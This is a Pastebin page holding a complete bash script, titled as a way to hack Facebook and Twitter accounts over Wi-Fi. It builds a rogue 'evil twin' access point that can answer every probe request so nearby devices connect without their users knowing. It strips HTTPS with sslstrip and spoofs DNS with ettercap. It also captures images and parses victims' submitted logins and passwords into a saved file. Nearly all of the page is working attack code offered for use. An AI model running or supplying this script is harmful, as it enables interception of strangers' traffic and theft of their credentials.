Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
- if [[ $var = 1 ]];then # if 1, use it in dhcpd.conf
- apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
- elif [[ $var > 1 ]];then
- apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',')
- apdns=${apdns//,/", "} # add a space after all commas
- apdns=${apdns%", "} # delete the final comma/space
- else apdns=0 # default in case resolv.conf is empty, which would prevent dhcpd starting
- fi
- RED=$(tput setaf 1)
- GREEN=$(tput bold ; tput setaf 2)
- YELLOW=$(tput bold ; tput setaf 3)
- # Network questions
- echo $GREEN
- echo "Juan Sacco - @juansacco - juansacco@gmail.com"
- echo "Wifi - Gemelo Malvado MITM"
- echo
- echo $YELLOW
- ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Internet Interface :", $5}'
- echo
- iface=$(ip route show | awk '(NR == 1) { print $5}')
- gateway=$(ip route show | awk '(NR == 1) { print $3}')
- echo $GREEN
- echo "Enter the networks gateway IP address or press enter to use $gateway:"
- echo $YELLOW
- read -e gatewayip
- if [ "$gatewayip" = "" ];then
- gatewayip=$gateway
- echo "$gatewayip selected as default."
- fi
- echo $GREEN
- echo "Enter your interface that is connected to the internet or press enter to use $iface:"
- echo $YELLOW
- read -e internet_interface
- if [ "$internet_interface" = "" ];then
- internet_interface=$iface
- echo "$internet_interface selected as default."
- fi
- echo $GREEN
- echo "Select your interface to be used for the fake AP:"
- echo $YELLOW
- interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
- select fakeap_interface in $interfaces; do
- break;
- done
- echo $GREEN
- echo "Enter the ESSID you would like your rogue AP to be called or press enter to use Fake_AP:"
- echo $YELLOW
- read -e ESSID
- if [ "$ESSID" = "" ];then
- ESSID="Fake_AP"
- echo "$ESSID selected as default."
- fi
- echo
- sleep 2
- clear
- # Cleaning
- killall sslstrip &> /dev/null
- killall driftnet &> /dev/null
- killall airbase-ng &> /dev/null
- killall ettercap &> /dev/null
- killall looparse &> /dev/null
- # Start Fake Ap interface
- airmon-ng start $fakeap_interface
- fakeap=$fakeap_interface
- fakeap_interface="mon0"
- # Dhcpd creation
- SUBNET=$(ip route show | awk '(NR == 2)' | cut -d '/' -f1)
- if [ "$SUBNET" = "10.0.0.0" ]; then
- SUBNET="192.168.1.0"
- GATEWAY="192.168.1.1"
- RANGE="192.168.1.20 192.168.1.50"
- else
- SUBNET="192.168.1.0"
- GATEWAY="192.168.1.1"
- RANGE="192.168.1.200 192.168.1.220"
- fi
- mkdir -p /tmp/Airssl
- echo "authoritative;
- default-lease-time 600;
- max-lease-time 7200;
- subnet $SUBNET netmask 255.255.255.0 {
- option routers $GATEWAY;
- ddns-update-style none;
- option domain-name-servers $apdns;
- range $RANGE;
- }" > /tmp/Airssl/dhcpd.conf
- # Fake ap setup
- while true; do
- sleep 2
- clear
- echo $GREEN
- echo "
- Configuring FakeAP...."
- echo $YELLOW
- echo "Airbase-ng will run in its most basic mode, would you like to run airbase-ng in respond to all probes mode?"
- echo
- echo "In this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes, providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly."
- echo $RED "PLEASE USE THIS OPTION RESPONSIBLY. "
- echo $YELLOW
- echo " 1) Yes"
- echo " 2) No"
- echo -n " #? "
- read yn
- case $yn in
- 1 ) AIRBASE=1 ; break ;;
- 2 ) AIRBASE=0 ; break ;;
- * ) echo
- echo $RED"wrong choice" ;;
- esac
- done
- sleep 2
- clear
- echo $GREEN
- echo "
- Starting FakeAP..."
- if [ "$AIRBASE" = "1" ]; then
- xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
- else
- xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
- fi
- sleep 2
- # Tables
- echo
- echo "
- Configuring forwarding tables..." $RED
- ifconfig lo up
- ifconfig at0 up &
- sleep 1
- ifconfig at0 $GATEWAY netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net $SUBNET netmask 255.255.255.0 gw $GATEWAY
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain && iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE && iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- # DHCP
- echo $GREEN
- echo "
- Setting up DHCP..."
- touch /var/run/dhcpd.pid
- #chown dhcpd:dhcpd /var/run/dhcpd.pid
- xterm -bg black -fg green -geometry 153x37-1+0 -T DHCP -e dhcpd -d -f -cf "/tmp/Airssl/dhcpd.conf" at0 & dchpid=$!
- sleep 2
- # Sslstrip
- echo
- echo "
- Starting sslstrip..." $YELLOW
- sslstrip -f -p -k -l 10000 -w /tmp/Airssl/sslstrip.log 2> /dev/null & sslstripid=$!
- sleep 2
- # Ettercap
- echo $GREEN
- echo "
- Starting ettercap..."
- #xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -C -P dns_spoof -i at0 & ettercapid=$!
- xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -P dns_spoof -q -w /tmp/Airssl/etter.cap -i at0 & ettercapid=$!
- sleep 2
- ############################
- ## Copied of yamas script ##
- ############################
- echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/Airssl/grepcred.txt
- echo "looparse(){
- while :
- do
- clear
- echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
- cat /tmp/Airssl/sslstrip.log |
- awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
- awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
- egrep -i -f '/tmp/Airssl/grepcred.txt' |
- awk -F \"=\" '{if (length(\$2) < 3) print \"\";
- else if (\$1 ~/[W]/) print \$0;
- else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
- else print \"Login = \t\t\", \$2}' |
- uniq
- sleep 7
- done
- }
- looparse" > /tmp/Airssl/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
- chmod +x /tmp/Airssl/looparse.sh
- xterm -bg black -fg green -geometry 153x37-1-0 -T Passwords -e /tmp/Airssl/looparse.sh & looparseid=$! #here's the beauty
- ############################
- ############################
- # Driftnet
- echo $GREEN
- echo "
- Starting driftnet..."
- mkdir -p "/tmp/Airssl/Images_$(date +%d%m%y)"
- driftnet -i at0 -a -d /tmp/Airssl/Images_$(date +%d%m%y) > /dev/null & dritnetid=$!
- sleep 2
- clear
- echo
- echo "
- Activated..."
- echo $YELLOW
- echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap.
- You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to "$HOME/Airssl/etter.cap".
- Sslstrip captured passwords will be saved to $HOME/Airssl/passwords.txt.
- Driftnet images will be saved to $HOME/Airssl/driftftnetdata"
- echo
- echo $RED
- echo "
- IMPORTANT..."
- echo "After you have finished please close airssl and clean up properly by hitting any key,
- if airssl is not closed properly ERRORS WILL OCCUR "
- read junk
- echo
- mkdir -p $HOME/Airssl
- ############################
- ## Copied of yamas script ##
- ############################
- cat /tmp/Airssl/sslstrip.log |
- awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
- awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
- egrep -i -a -f /tmp/Airssl/grepcred.txt |
- awk -F "=" '{if (length($2) < 4) print "";
- else if ($1 ~/Website/) print $0;
- else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
- else print "Login = \t"$2}' |
- uniq >> $HOME/Airssl/passwords.txt
- if [ -f "$HOME/Airssl/passwords.txt" ]; then
- echo $GREEN "Passwords saved !"
- else
- echo $RED "Error while saving passwords"
- fi
- ############################
- ############################
- cp -rf /tmp/Airssl/Images_$(date +%d%m%y) $HOME/Airssl
- if [ -d "$HOME/Airssl/Images_$(date +%d%m%y)" ]; then
- echo $GREEN "Images saved !"
- else
- echo $RED "Error while saving images"
- fi
- cp -rf /tmp/Airssl/etter.cap $HOME/Airssl
- if [ -f "$HOME/Airssl/etter.cap" ]; then
- echo $GREEN "Capture file saved !"
- else
- echo $RED "Error while Capture file"
- fi
- echo $GREEN
- echo "
- Cleaning up airssl and resetting iptables..." $YELLOW
- kill ${fakeapid} &> /dev/null
- kill ${dchpid} &> /dev/null
- kill ${sslstripid} &> /dev/null
- kill ${ettercapid} &> /dev/null
- kill ${dritnetid} &> /dev/null
- kill ${looparseid} &> /dev/null
- airmon-ng stop $fakeap_interface
- airmon-ng stop $fakeap
- echo "0" > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- rm -rf /tmp/Airssl
- echo $GREEN
- echo "
- Clean up successful..."
- echo
- echo "
- Thank you for using airssl, Good Bye..."
- exit
- Gemelo.sh - Hackeando Facebook y Twitter desde WIFI
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement